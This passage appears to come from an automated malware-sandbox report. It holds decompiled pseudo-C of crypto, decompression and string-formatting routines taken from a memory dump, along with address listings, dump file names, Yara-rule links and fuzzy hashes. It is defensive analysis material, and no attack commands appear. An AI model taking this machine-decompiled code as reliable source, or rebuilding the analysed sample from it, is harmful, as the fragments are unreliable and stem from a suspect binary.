								 *(_t432 + 0x10) = _t394;
								 *(_t432 + 0x3c) = _t394;
								_t376 =  *(0xa25750 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa25b50 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa25f50 + ( *(_t432 + 0x68) >> 0x18) * 4) ^  *(0xa25350 + ( *(_t432 + 0x14) & 0x000000ff) * 4);
								_t135 = _t432 + 0x18;
								 *_t135 =  *((intOrPtr*)(_t432 + 0x18)) - 1;
								 *(_t432 + 0x40) = _t376;
							} while ( *_t135 != 0);
							_t429 =  *((intOrPtr*)(_t432 + 0x24));
							 *(_t432 + 0x68) = _t416;
							_t415 =  *(_t432 + 0x6c);
							 *(_t432 + 0x14) = _t376;
							L9:
							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x68);
							 *(_t432 + 0x6c) = _t253;
							 *(_t432 + 0x44) = _t253;
							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x14);
							 *(_t432 + 0x34) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0xa24230));
							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x10);
							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x70);
							 *((char*)(_t432 + 0x35)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0xa24230));
							_t423 =  *(_t432 + 0x6c);
							 *(_t432 + 0x4c) = _t406;
							 *(_t432 + 0x48) = _t350;
							 *((char*)(_t432 + 0x36)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0xa24230));
							 *(_t432 + 0x50) = _t378;
							 *((char*)(_t432 + 0x37)) =  *((intOrPtr*)((_t350 >> 0x18) + 0xa24230));
							 *(_t432 + 0x38) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0xa24230));
							 *((char*)(_t432 + 0x39)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0xa24230));
							 *((char*)(_t432 + 0x3a)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0xa24230));
							_t170 = (_t406 >> 0x18) + 0xa24230; // 0x54cbe9de
							 *((char*)(_t432 + 0x3b)) =  *_t170;
							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0xa24230));
							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0xa24230));
							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0xa24230));
							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t378 >> 0x18) + 0xa24230));
							 *(_t432 + 0x40) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0xa24230));
							_t409 =  *(_t432 + 0x34) ^  *(_t429 + 0x18);
							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0xa24230));
							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0xa24230));
							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t423 >> 0x18) + 0xa24230));
							_t301 =  *(_t432 + 0x40) ^  *(_t429 + 0x24);
							_t426 =  *(_t432 + 0x38) ^  *(_t429 + 0x1c);
							_t353 =  *(_t432 + 0x3c) ^  *(_t429 + 0x20);
							 *(_t432 + 0x6c) = _t301;
							if( *((char*)(_t429 + 1)) != 0) {
								_t409 = _t409 ^  *(_t432 + 0x54);
								_t426 = _t426 ^  *(_t432 + 0x58);
								_t353 = _t353 ^  *(_t432 + 0x5c);
								 *(_t432 + 0x6c) = _t301 ^  *(_t432 + 0x60);
							}
							 *(_t432 + 0x54) =  *( *(_t432 + 0x28));
							_t304 =  *(_t432 + 0x1c);
							 *(_t432 + 0x58) =  *(_t304 - 4);
							 *(_t432 + 0x5c) =  *_t304;
							 *(_t432 + 0x60) = _t304[1];
							_t382 =  *(_t432 + 0x20);
							 *(_t432 + 0x1c) =  &(_t304[4]);
							 *(_t382 - 8) = _t409;
							_t382[1] =  *(_t432 + 0x6c);
							_t400 =  *((intOrPtr*)(_t432 + 0x2c));
							 *(_t382 - 4) = _t426;
							 *_t382 = _t353;
							_t359 =  &(_t382[4]);
							_t415 = _t415 - 1;
							 *(_t432 + 0x20) = _t359;
							 *(_t432 + 0x6c) = _t415;
						} while (_t415 != 0);
						goto L13;
					}
					return E009EE3D4(__ecx,  *((intOrPtr*)(_t431 + 0x68)), _t415,  *((intOrPtr*)(_t431 + 0x68)));
				}
				return _t222;
			}











































                            0x009edf17
                            0x009edf1b
                            0x009edf1d
                            0x009edf23
                            0x009edf29
                            0x009edf30
                            0x009edf34
                            0x009edf4f
                            0x009edf58
                            0x009edf5d
                            0x009edf62
                            0x009ee3b9
                            0x00000000
                            0x009ee3c9
                            0x009edf68
                            0x009edf71
                            0x009edf75
                            0x009edf79
                            0x009edf7b
                            0x009edf7f
                            0x009edf82
                            0x009edf86
                            0x009edf86
                            0x009edf96
                            0x009edfa3
                            0x009edfa8
                            0x009edfce
                            0x009edfd2
                            0x009edfdd
                            0x009edfe4
                            0x009edfe8
                            0x009edfef
                            0x009ee015
                            0x009ee021
                            0x009ee025
                            0x009ee033
                            0x009ee03e
                            0x009ee055
                            0x009ee061
                            0x009ee065
                            0x009ee07c
                            0x009ee091
                            0x009ee098
                            0x009ee099
                            0x009ee09d
                            0x009ee0a4
                            0x00000000
                            0x00000000
                            0x009ee0aa
                            0x009ee0b4
                            0x009ee0b7
                            0x009ee0bb
                            0x009ee0bd
                            0x009ee0c1
                            0x009ee0c6
                            0x009ee0c9
                            0x009ee0cd
                            0x009ee0d3
                            0x009ee0d5
                            0x009ee0d9
                            0x009ee0e8
                            0x009ee118
                            0x009ee129
                            0x009ee13b
                            0x009ee157
                            0x009ee160
                            0x009ee164
                            0x009ee19d
                            0x009ee1a4
                            0x009ee1a8
                            0x009ee1d5
                            0x009ee1dc
                            0x009ee1dc
                            0x009ee1e1
                            0x009ee1e1
                            0x009ee1eb
                            0x009ee1ef
                            0x009ee1f3
                            0x009ee1f7
                            0x009ee1fb
                            0x009ee1fe
                            0x009ee202
                            0x009ee206
                            0x009ee210
                            0x009ee21d
                            0x009ee229
                            0x009ee230
                            0x009ee23a
                            0x009ee246
                            0x009ee24a
                            0x009ee24e
                            0x009ee258
                            0x009ee261
                            0x009ee26b
                            0x009ee278
                            0x009ee28a
                            0x009ee29c
                            0x009ee2a5
                            0x009ee2ab
                            0x009ee2bb
                            0x009ee2d0
                            0x009ee2e5
                            0x009ee2f4
                            0x009ee301
                            0x009ee30c
                            0x009ee315
                            0x009ee322
                            0x009ee32c
                            0x009ee33c
                            0x009ee33f
                            0x009ee342
                            0x009ee349
                            0x009ee34d
                            0x009ee34f
                            0x009ee353
                            0x009ee357
                            0x009ee35f
                            0x009ee35f
                            0x009ee369
                            0x009ee36d
                            0x009ee374
                            0x009ee37a
                            0x009ee384
                            0x009ee388
                            0x009ee38c
                            0x009ee390
                            0x009ee397
                            0x009ee39a
                            0x009ee39e
                            0x009ee3a1
                            0x009ee3a3
                            0x009ee3a6
                            0x009ee3a9
                            0x009ee3ad
                            0x009ee3ad
                            0x00000000
                            0x009ee3b8
                            0x00000000
                            0x009edf3f
                            0x009ee3d1

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cb516dc1db43b26eda3d00807e7975c33193068145dc15bcaa2d32d159d16c5f
                            • Instruction ID: d4ab4e5d908960ab7080ea747e4a4963f1679ec31a676f4ce2449ee95e0c88ba
                            • Opcode Fuzzy Hash: cb516dc1db43b26eda3d00807e7975c33193068145dc15bcaa2d32d159d16c5f
                            • Instruction Fuzzy Hash: 1EE125759183848FC315CF69E49097ABBF0BB8A301F89096EF9D587352C235E916CF62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F364E, Relevance: .3, Instructions: 263COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E009F364E(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				intOrPtr _t116;
				signed int _t127;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t148;
				signed int _t150;
				void* _t152;
				signed int _t155;
				signed int _t156;
				intOrPtr* _t157;
				intOrPtr* _t166;
				signed int _t169;
				void* _t170;
				signed int _t173;
				void* _t178;
				unsigned int _t180;
				signed int _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t192;
				signed int _t198;
				void* _t201;

				_t178 = __edx;
				_t185 = __ecx;
				_t184 = __ecx + 4;
				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
					L2:
					E009EA4D1(_t184,  ~( *(_t185 + 8)) & 0x00000007);
					_t82 = E009EA4E8(_t184);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t137 = 0;
						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E009FE920(_t184, _t185 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E009EA4D1(_t184, 2);
						do {
							 *(_t201 + 0x14) = E009EA4E8(_t184) >> 0x0000000c & 0x000000ff;
							E009EA4D1(_t184, 4);
							_t88 =  *(_t201 + 0x10);
							__eflags = _t88 - 0xf;
							if(_t88 != 0xf) {
								 *(_t201 + _t137 + 0x14) = _t88;
								goto L15;
							}
							_t187 = E009EA4E8(_t184) >> 0x0000000c & 0x000000ff;
							E009EA4D1(_t184, 4);
							__eflags = _t187;
							if(_t187 != 0) {
								_t188 = _t187 + 2;
								__eflags = _t188;
								while(1) {
									_t188 = _t188 - 1;
									__eflags = _t137 - 0x14;
									if(_t137 >= 0x14) {
										break;
									}
									 *(_t201 + _t137 + 0x14) = 0;
									_t137 = _t137 + 1;
									__eflags = _t188;
									if(_t188 != 0) {
										continue;
									}
									break;
								}
								_t137 = _t137 - 1;
								goto L15;
							}
							 *(_t201 + _t137 + 0x14) = 0xf;
							L15:
							_t137 = _t137 + 1;
							__eflags = _t137 - 0x14;
						} while (_t137 < 0x14);
						_push(0x14);
						_t189 = _t185 + 0x3c50;
						_push(_t189);
						_push(_t201 + 0x1c);
						E009F2C88();
						_t138 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
								L19:
								_t93 = E009EA4ED(_t184);
								_t94 =  *(_t189 + 0x84);
								_t180 = _t93 & 0x0000fffe;
								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
									_t148 = 0xf;
									_t95 = _t94 + 1;
									 *(_t201 + 0x10) = _t148;
									__eflags = _t95 - _t148;
									if(_t95 >= _t148) {
										L27:
										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
										 *_t184 =  *_t184 + (_t150 >> 3);
										_t98 =  *(_t201 + 0x10);
										 *(_t184 + 4) = _t150 & 0x00000007;
										_t152 = 0x10;
										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
										__eflags = _t155 -  *_t189;
										asm("sbb eax, eax");
										_t99 = _t98 & _t155;
										__eflags = _t99;
										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
										L28:
										__eflags = _t156 - 0x10;
										if(_t156 >= 0x10) {
											__eflags = _t156 - 0x12;
											if(__eflags >= 0) {
												_t157 = _t184;
												if(__eflags != 0) {
													_t192 = (E009EA4E8(_t157) >> 9) + 0xb;
													__eflags = _t192;
													_push(7);
												} else {
													_t192 = (E009EA4E8(_t157) >> 0xd) + 3;
													_push(3);
												}
												E009EA4D1(_t184);
												while(1) {
													_t192 = _t192 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) = 0;
													_t138 = _t138 + 1;
													__eflags = _t192;
													if(_t192 != 0) {
														continue;
													}
													L44:
													_t189 = _t185 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t156 - 0x10;
											_t166 = _t184;
											if(_t156 != 0x10) {
												_t198 = (E009EA4E8(_t166) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E009EA4E8(_t166) >> 0xd) + 3;
												_push(3);
											}
											E009EA4D1(_t184);
											__eflags = _t138;
											if(_t138 == 0) {
												L47:
												_t116 = 0;
												L49:
												return _t116;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
													_t138 = _t138 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
										_t138 = _t138 + 1;
										goto L45;
									}
									_t169 = 4 + _t95 * 4 + _t189;
									__eflags = _t169;
									while(1) {
										__eflags = _t180 -  *_t169;
										if(_t180 <  *_t169) {
											break;
										}
										_t95 = _t95 + 1;
										_t169 = _t169 + 4;
										__eflags = _t95 - 0xf;
										if(_t95 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t95;
									goto L27;
								}
								_t170 = 0x10;
								_t183 = _t180 >> _t170 - _t94;
								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
								 *_t184 =  *_t184 + (_t173 >> 3);
								 *(_t184 + 4) = _t173 & 0x00000007;
								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
								goto L28;
							}
							_t127 = E009F4393(_t185);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t138 - 0x194;
						} while (_t138 < 0x194);
						L46:
						 *((char*)(_t185 + 0xe661)) = 1;
						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
							_push(0x12b);
							_push(_t185 + 0xa0);
							_push(_t201 + 0x30);
							E009F2C88();
							_push(0x3c);
							_push(_t185 + 0xf8c);
							_push(_t201 + 0x15b);
							E009F2C88();
							_push(0x11);
							_push(_t185 + 0x1e78);
							_push(_t201 + 0x197);
							E009F2C88();
							_push(0x1c);
							_push(_t185 + 0x2d64);
							_push(_t201 + 0x1a8);
							E009F2C88();
							E009FEA80(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
							_t116 = 1;
							goto L49;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
					_push(_t185 + 0xe4c4);
					_push(_t185);
					return E009F2435(_t185 + 0x98d8, _t178, _t205);
				}
				_t135 = E009F4393(__ecx);
				if(_t135 != 0) {
					goto L2;
				}
				return _t135;
			}





































                            0x009f364e
                            0x009f3655
                            0x009f365e
                            0x009f3666
                            0x009f3675
                            0x009f3680
                            0x009f3687
                            0x009f368c
                            0x009f3691
                            0x009f36b6
                            0x009f36b8
                            0x009f36be
                            0x009f36c4
                            0x009f36ca
                            0x009f36cf
                            0x009f36de
                            0x009f36e3
                            0x009f36e3
                            0x009f36ea
                            0x009f36f0
                            0x009f3701
                            0x009f3705
                            0x009f370a
                            0x009f370e
                            0x009f3711
                            0x009f374a
                            0x00000000
                            0x009f374a
                            0x009f3721
                            0x009f3724
                            0x009f3729
                            0x009f372b
                            0x009f3734
                            0x009f3734
                            0x009f3737
                            0x009f3737
                            0x009f3738
                            0x009f373b
                            0x00000000
                            0x00000000
                            0x009f373d
                            0x009f3742
                            0x009f3743
                            0x009f3745
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f3745
                            0x009f3747
                            0x00000000
                            0x009f3747
                            0x009f372d
                            0x009f374e
                            0x009f374e
                            0x009f374f
                            0x009f374f
                            0x009f3754
                            0x009f3756
                            0x009f375e
                            0x009f3763
                            0x009f3764
                            0x009f3769
                            0x009f3769
                            0x009f376b
                            0x009f3774
                            0x009f3776
                            0x009f3787
                            0x009f3789
                            0x009f3790
                            0x009f3796
                            0x009f379c
                            0x009f37a0
                            0x009f37cd
                            0x009f37ce
                            0x009f37cf
                            0x009f37d3
                            0x009f37d5
                            0x009f37f3
                            0x009f37f6
                            0x009f3802
                            0x009f3804
                            0x009f3808
                            0x009f380d
                            0x009f381a
                            0x009f381c
                            0x009f381f
                            0x009f3821
                            0x009f3821
                            0x009f3823
                            0x009f382b
                            0x009f382b
                            0x009f382e
                            0x009f3845
                            0x009f3848
                            0x009f3894
                            0x009f3896
                            0x009f38b3
                            0x009f38b3
                            0x009f38b6
                            0x009f3898
                            0x009f38a2
                            0x009f38a5
                            0x009f38a5
                            0x009f38ba
                            0x009f38bf
                            0x009f38bf
                            0x009f38c0
                            0x009f38c6
                            0x00000000
                            0x00000000
                            0x009f38c8
                            0x009f38cd
                            0x009f38ce
                            0x009f38d0
                            0x00000000
                            0x00000000
                            0x009f38d2
                            0x009f38d2
                            0x00000000
                            0x009f38d2
                            0x00000000
                            0x009f38bf
                            0x009f384a
                            0x009f384d
                            0x009f384f
                            0x009f386c
                            0x009f386c
                            0x009f386f
                            0x009f3851
                            0x009f385b
                            0x009f385e
                            0x009f385e
                            0x009f3873
                            0x009f3878
                            0x009f387a
                            0x009f38f5
                            0x009f38f5
                            0x009f3974
                            0x00000000
                            0x009f387c
                            0x009f387c
                            0x009f387c
                            0x009f387d
                            0x009f3883
                            0x00000000
                            0x00000000
                            0x009f3889
                            0x009f388d
                            0x009f388e
                            0x009f3890
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f3892
                            0x00000000
                            0x009f387c
                            0x009f387a
                            0x009f383b
                            0x009f383f
                            0x00000000
                            0x009f383f
                            0x009f37de
                            0x009f37de
                            0x009f37e0
                            0x009f37e0
                            0x009f37e2
                            0x00000000
                            0x00000000
                            0x009f37e4
                            0x009f37e5
                            0x009f37e8
                            0x009f37eb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f37ed
                            0x009f37ef
                            0x00000000
                            0x009f37ef
                            0x009f37a4
                            0x009f37a7
                            0x009f37b1
                            0x009f37b9
                            0x009f37be
                            0x009f37c1
                            0x00000000
                            0x009f37c1
                            0x009f377a
                            0x009f377f
                            0x009f3781
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f38d8
                            0x009f38d8
                            0x009f38d8
                            0x009f38e4
                            0x009f38e6
                            0x009f38ed
                            0x009f38f3
                            0x009f38f9
                            0x009f3906
                            0x009f390b
                            0x009f390c
                            0x009f3911
                            0x009f391b
                            0x009f3923
                            0x009f3924
                            0x009f3929
                            0x009f3933
                            0x009f393b
                            0x009f393c
                            0x009f3941
                            0x009f394b
                            0x009f3953
                            0x009f3954
                            0x009f396a
                            0x009f3972
                            0x00000000
                            0x009f3972
                            0x00000000
                            0x009f38f3
                            0x009f3699
                            0x009f36a3
                            0x009f36a4
                            0x00000000
                            0x009f36ab
                            0x009f3668
                            0x009f366f
                            0x00000000
                            0x00000000
                            0x009f397e

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
                            • Instruction ID: 68b0f3523f68799e9b3a95e5c8aac3e2ea86668af53b4b5ceb4fb9861f295f13
                            • Opcode Fuzzy Hash: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
                            • Instruction Fuzzy Hash: B3912CB020434D9BDB24EF68D895BBE77D5AB90304F10892DF797872C2EA7CAA44C751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A03EE9, Relevance: .2, Instructions: 237COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E00A03EE9(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed int _t57;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int* _t103;
				void* _t105;
				signed int _t111;
				unsigned int _t113;
				signed char _t115;
				void* _t123;
				unsigned int _t124;
				void* _t125;
				signed int _t126;
				short _t127;
				void* _t130;
				void* _t132;
				void* _t134;
				signed int _t135;
				void* _t136;
				void* _t138;
				void* _t139;

				_t125 = __edi;
				_t52 =  *0xa1d668; // 0xda86b1c8
				_v8 = _t52 ^ _t135;
				_t134 = __ecx;
				_t102 = 0;
				_t123 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t105 = 0x58;
				_t138 = _t54 - 0x64;
				if(_t138 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00A0491B(_t134);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t134 + 0x30)) - _t102;
								if( *((intOrPtr*)(_t134 + 0x30)) != _t102) {
									L71:
									_t57 = 1;
									L72:
									return E009FE203(_t57, _v8 ^ _t135);
								}
								_t124 =  *(_t134 + 0x20);
								_push(_t125);
								_v16 = _t102;
								_t60 = _t124 >> 4;
								_v12 = _t102;
								_t126 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t111 =  *(_t134 + 0x32) & 0x0000ffff;
									__eflags = _t111 - 0x78;
									if(_t111 == 0x78) {
										L48:
										_t62 = _t124 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t111 - 0x61;
											if(_t111 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t127 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t135 + _t102 * 2 - 0xc)) = _t127;
													__eflags = _t111 - _t65;
													if(_t111 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t135 + _t102 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t102 = _t102 + 2;
														__eflags = _t102;
														L62:
														_t130 =  *((intOrPtr*)(_t134 + 0x24)) -  *((intOrPtr*)(_t134 + 0x38)) - _t102;
														__eflags = _t124 & 0x0000000c;
														if((_t124 & 0x0000000c) == 0) {
															E00A031B0(_t134 + 0x448, 0x20, _t130, _t134 + 0x18);
															_t136 = _t136 + 0x10;
														}
														E00A04C36(_t134 + 0x448,  &_v16, _t102, _t134 + 0x18,  *((intOrPtr*)(_t134 + 0xc)));
														_t113 =  *(_t134 + 0x20);
														_t103 = _t134 + 0x18;
														_t75 = _t113 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t115 = _t113 >> 2;
															__eflags = _t115 & 0x00000001;
															if((_t115 & 0x00000001) == 0) {
																E00A031B0(_t134 + 0x448, 0x30, _t130, _t103);
																_t136 = _t136 + 0x10;
															}
														}
														E00A04B18(_t134, 0);
														__eflags =  *_t103;
														if( *_t103 >= 0) {
															_t78 =  *(_t134 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00A031B0(_t134 + 0x448, 0x20, _t130, _t103);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t111 - _t86;
													if(_t111 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t132 = 0x41;
											__eflags = _t111 - _t132;
											if(_t111 == _t132) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t111 - _t88;
									if(_t111 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t124 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t124;
									if((1 & _t124) == 0) {
										_t92 = _t124 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t126;
										L45:
										_t102 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							_t57 = 0;
							goto L72;
						}
						_t95 = _t55;
						__eflags = _t95;
						if(__eflags == 0) {
							L28:
							_push(_t102);
							_push(0xa);
							L29:
							_t56 = E00A046B3(_t134, _t125, __eflags);
							goto L10;
						}
						__eflags = _t95 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00A04890(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00A04419(_t102, _t134);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t134 + 0x20;
						 *_t3 =  *(_t134 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00A047FD(__ecx, _t123);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00A04871(__ecx);
					goto L10;
				}
				if(_t138 == 0) {
					goto L27;
				}
				_t139 = _t54 - _t105;
				if(_t139 > 0) {
					_t97 = _t54 - 0x5a;
					__eflags = _t97;
					if(_t97 == 0) {
						_t56 = E00A0425C(__ecx);
						goto L10;
					}
					_t98 = _t97 - 7;
					__eflags = _t98;
					if(_t98 == 0) {
						goto L30;
					}
					__eflags = _t98;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00A0461B(_t134, __eflags, _t102);
					goto L10;
				}
				if(_t139 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t123) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}












































                            0x00a03ee9
                            0x00a03ef1
                            0x00a03ef8
                            0x00a03efd
                            0x00a03eff
                            0x00a03f03
                            0x00a03f06
                            0x00a03f0a
                            0x00a03f0b
                            0x00a03f0e
                            0x00a03f7b
                            0x00a03f7e
                            0x00a03fcd
                            0x00a03fcd
                            0x00a03fd0
                            0x00a03f3c
                            0x00a03f3e
                            0x00a03f43
                            0x00a03f45
                            0x00a03feb
                            0x00a03fee
                            0x00a04134
                            0x00a04134
                            0x00a04136
                            0x00a04145
                            0x00a04145
                            0x00a03ff4
                            0x00a03ff9
                            0x00a03ffc
                            0x00a03fff
                            0x00a04003
                            0x00a04009
                            0x00a0400a
                            0x00a0400c
                            0x00a04036
                            0x00a04036
                            0x00a0403a
                            0x00a0403d
                            0x00a04047
                            0x00a04049
                            0x00a0404c
                            0x00a0404e
                            0x00a04054
                            0x00a04054
                            0x00a04056
                            0x00a04056
                            0x00a04059
                            0x00a04067
                            0x00a04067
                            0x00a04069
                            0x00a0406b
                            0x00a0406c
                            0x00a0406e
                            0x00a04074
                            0x00a04076
                            0x00a04077
                            0x00a0407c
                            0x00a0407f
                            0x00a0408d
                            0x00a0408d
                            0x00a0408f
                            0x00a0408f
                            0x00a0409a
